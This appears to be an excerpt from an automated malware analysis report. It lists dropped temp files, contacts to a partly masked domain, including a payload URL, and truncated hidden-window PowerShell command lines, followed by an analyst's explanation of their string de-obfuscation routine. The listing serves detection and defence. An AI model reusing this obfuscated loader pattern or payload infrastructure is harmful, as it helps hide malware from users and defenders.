Technical Information
- %APPDATA%\bitd374.tmp
- %APPDATA%\bit26c3.tmp
- %APPDATA%\bitd374.tmp
- %APPDATA%\bit26c3.tmp
- from %APPDATA%\bitd374.tmp to %APPDATA%\overn.anx
- from %APPDATA%\bit26c3.tmp to %APPDATA%\overn.anx
- 'al###naunco.com':80
- http://al###naunco.com/one/Midtpunkts.java
- http://al###naunco.com/cgi-sys/suspendedpage.cgi
- DNS ASK al###naunco.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Muscids609 ([String]$Pagina){For($Lsrepants0=4; $Lsrepants0 -lt $Pagina.Length-1; $Lsrepants0+=(4+1)){$Unscabro=$Pagina.Substring( $Lsrepants0, 1);$Isoamidkly+=$Unscabro};...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Muscids609 ([String]$Pagina){For($Lsrepants0=4; $Lsrepants0 -lt $Pagina.Length-1; $Lsrepants0+=(4+1)){$Unscabro=$Pagina.Substring( $Lsrepants0, 1);$Isoamidkly+=$Unscabro};...
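- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Muscids609 ([String]$Pagina){For($Lsrepants0=4; $Lsrepants0 -lt $Pagina.Length-1; $Lsrepants0+=(4+1)){$Unscabro=$Pagina.Substring( $Lsrepants0, 1);$Isoamidkly+=$Unscabro};...
Note: the visible part of these three command lines defines a helper, Muscids609, that builds a string from every fifth character of its argument, starting at index 4. This is a string de-obfuscation routine. The rest of the script is truncated ("...") in this listing, so what the decoded strings are used for cannot be determined from it. Where PowerShell script block logging (event ID 4104) is enabled, the script text is recorded as it runs, which helps recover what the truncated part does.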